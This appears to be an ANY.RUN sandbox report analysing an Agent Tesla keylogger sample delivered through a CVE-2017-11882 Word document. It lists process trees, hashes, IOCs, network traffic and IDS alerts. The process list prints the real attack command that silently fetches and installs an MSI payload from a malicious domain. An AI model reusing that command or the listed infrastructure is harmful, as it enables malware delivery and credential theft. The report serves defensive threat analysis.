analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sample1.zip

Full analysis: https://app.any.run/tasks/c261d626-7870-4b60-90fb-06510bc9fb47
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: July 17, 2019, 15:00:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
opendir
loader
exe-to-msi
evasion
trojan
rat
agenttesla
keylogger
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

36CA9A3E3253C409866D609C43DA6C11

SHA1:

24DBB1F7C7D844C7981E334FCCF00578AEC7699D

SHA256:

05C73FC0CCB3099D77B39FC7ABF255B12A9BE58B91D0DF16B20542098440BF9B

SSDEEP:

12288:pNYh/zAmrTgfnJXyJoQLnl97cUUs427556xHNesoJ3wY4R:pK9BrUfnJXyJfzl9wUUw55sHNDoJ3wfR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1812)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3912)
    • Uses Task Scheduler to run other applications

      • MSIB73.tmp (PID: 3556)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3736)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2136)
    • AGENTTESLA was detected

      • MSIB73.tmp (PID: 2948)
    • Actions looks like stealing of personal data

      • MSIB73.tmp (PID: 2948)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 1812)
      • EQNEDT32.EXE (PID: 2264)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3736)
      • MSIB73.tmp (PID: 3556)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 1812)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3736)
    • Creates files in the user directory

      • MSIB73.tmp (PID: 3556)
      • MSIB73.tmp (PID: 2948)
    • Reads Windows Product ID

      • MSIB73.tmp (PID: 2948)
    • Reads Environment values

      • MSIB73.tmp (PID: 2948)
    • Checks for external IP

      • MSIB73.tmp (PID: 2948)
    • Reads the cookies of Mozilla Firefox

      • MSIB73.tmp (PID: 2948)
    • Reads the cookies of Google Chrome

      • MSIB73.tmp (PID: 2948)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3628)
      • opera.exe (PID: 916)
    • Application was crashed

      • EQNEDT32.EXE (PID: 1812)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3628)
      • opera.exe (PID: 916)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3628)
    • Application was dropped or rewritten from another process

      • MSIB73.tmp (PID: 2948)
      • MSIB73.tmp (PID: 3556)
    • Starts application with an unusual extension

      • MSIB73.tmp (PID: 3556)
      • msiexec.exe (PID: 3736)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3736)
    • Application launched itself

      • MSIB73.tmp (PID: 3556)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: faf195e07868c79a597306269b2f4fd7eef96257d46a56beb5dd3b7792e200dd.bin
ZipUncompressedSize: 3128275
ZipCompressedSize: 456612
ZipCRC: 0xfae53e8f
ZipModifyDate: 2019:07:17 14:59:28
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 788
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
11
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msib73.tmp schtasks.exe no specs #AGENTTESLA msib73.tmp opera.exe

Process information

PID
CMD
Path
Indicators
Parent process
3716"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3628"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayy.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1812"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3912cmd.exe & /C CD C: & msiexec.exe /i http://baladefarms.ga/a/kali.msi /qn C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3552msiexec.exe /i http://baladefarms.ga/a/kali.msi /qn C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3736C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2264"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3556"C:\Windows\Installer\MSIB73.tmp"C:\Windows\Installer\MSIB73.tmp
msiexec.exe
User:
admin
Company:
Saab
Integrity Level:
MEDIUM
Description:
Platformer
Exit code:
0
Version:
1.0.0.0
2136"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AGOkcrwBoew" /XML "C:\Users\admin\AppData\Local\Temp\tmpC942.tmp"C:\Windows\System32\schtasks.exeMSIB73.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2948"C:\Windows\Installer\MSIB73.tmp"C:\Windows\Installer\MSIB73.tmp
MSIB73.tmp
User:
admin
Company:
Saab
Integrity Level:
MEDIUM
Description:
Platformer
Version:
1.0.0.0
Total events
2 000
Read events
1 383
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
29
Text files
17
Unknown types
8

Dropped files

PID
Process
Filename
Type
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3716.17274\faf195e07868c79a597306269b2f4fd7eef96257d46a56beb5dd3b7792e200dd.bin
MD5:
SHA256:
3628WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD618.tmp.cvr
MD5:
SHA256:
3736msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFD2C777E45AD6DDDB.TMP
MD5:
SHA256:
3736msiexec.exeC:\Config.Msi\f0a2a.rbs
MD5:
SHA256:
3736msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF56E92892C7A7FD86.TMP
MD5:
SHA256:
3628WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ayy.doc.LNKlnk
MD5:6232F89C80455E125FE9A425A20CA2C7
SHA256:BF1DEBB31C32EA1CDB9DDC334F7B5A4C0E850A1F2C1909702189D140DE11EAAA
3628WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1D77B4343C9257A087C48F6ECDD56D1D
SHA256:5A4B1B2C1C4A9C87379FAD1843DBA5EEAF6C9D2C059EA3B4E2E47CC8F3FAAFC3
3628WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:BF5190F8289D6BF67AD3F1DFC9FFC77C
SHA256:7C4163D0118D50C17F74FBB366E9FDEB063E1DE71C5137F36D4A89468E2C3217
3628WINWORD.EXEC:\Users\admin\Desktop\~$ayy.docpgc
MD5:6BEF9D61BC105D4011A1662C078F9DE7
SHA256:A4941AE925A9920FE618E5AD1DAD2278B00C84C9668DE74627DC4D1677B88EAC
3736msiexec.exeC:\Windows\Installer\MSI5D3.tmpexecutable
MD5:66DC5CBECDE84CBA63F93ACF04C88CDD
SHA256:F921D0896EF13ACE46F57819AA12A379D54DEFE42B3B338C0BEDBAFD2ACE0F9E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
10
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3736
msiexec.exe
GET
200
198.54.125.61:80
http://baladefarms.ga/a/kali.msi
US
executable
1016 Kb
malicious
2948
MSIB73.tmp
GET
200
52.6.79.229:80
http://checkip.amazonaws.com/
US
text
14 b
shared
916
opera.exe
GET
200
93.184.220.29:80
http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl
US
der
528 b
whitelisted
916
opera.exe
GET
198.54.125.61:80
http://baladefarms.ga/a/
US
malicious
916
opera.exe
GET
200
172.217.18.110:80
http://clients1.google.com/complete/search?q=bala&client=opera-suggest-omnibox&hl=de
US
text
111 b
whitelisted
916
opera.exe
GET
200
172.217.18.110:80
http://clients1.google.com/complete/search?q=baladefarms&client=opera-suggest-omnibox&hl=de
US
text
42 b
whitelisted
916
opera.exe
GET
200
172.217.18.110:80
http://clients1.google.com/complete/search?q=bal&client=opera-suggest-omnibox&hl=de
US
text
104 b
whitelisted
916
opera.exe
GET
200
172.217.18.110:80
http://clients1.google.com/complete/search?q=balade&client=opera-suggest-omnibox&hl=de
US
text
107 b
whitelisted
916
opera.exe
GET
200
172.217.18.110:80
http://clients1.google.com/complete/search?q=balad&client=opera-suggest-omnibox&hl=de
US
text
79 b
whitelisted
916
opera.exe
GET
400
185.26.182.112:80
http://sitecheck2.opera.com/?host=baladefarms.ga&hdn=nP81LKSPtXaS/1zzensL1Q==
unknown
html
150 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
916
opera.exe
185.26.182.94:443
certs.opera.com
Opera Software AS
whitelisted
916
opera.exe
172.217.18.110:80
clients1.google.com
Google Inc.
US
whitelisted
2948
MSIB73.tmp
52.6.79.229:80
checkip.amazonaws.com
Amazon.com, Inc.
US
shared
916
opera.exe
198.54.125.61:80
baladefarms.ga
Namecheap, Inc.
US
malicious
916
opera.exe
93.184.220.29:80
crl4.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
916
opera.exe
185.26.182.112:80
sitecheck2.opera.com
Opera Software AS
malicious
2948
MSIB73.tmp
198.54.125.61:26
baladefarms.ga
Namecheap, Inc.
US
malicious
3736
msiexec.exe
198.54.125.61:80
baladefarms.ga
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
baladefarms.ga
  • 198.54.125.61
malicious
certs.opera.com
  • 185.26.182.94
  • 185.26.182.93
whitelisted
crl4.digicert.com
  • 93.184.220.29
whitelisted
clients1.google.com
  • 172.217.18.110
whitelisted
checkip.amazonaws.com
  • 52.6.79.229
  • 34.197.157.64
  • 18.211.215.84
  • 52.202.139.131
  • 52.206.161.133
  • 34.233.102.38
shared
sitecheck2.opera.com
  • 185.26.182.112
  • 185.26.182.93
  • 185.26.182.94
  • 185.26.182.111
whitelisted
mail.sweeddehacklord.us
  • 198.54.125.61
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ga Domain
3736
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3736
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3736
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
2948
MSIB73.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AgentTesla IP Check
2948
MSIB73.tmp
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2948
MSIB73.tmp
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2948
MSIB73.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Spy.Keylogger.AgentTesla Exfiltration by SMTP
4 ETPRO signatures available at the full report
No debug info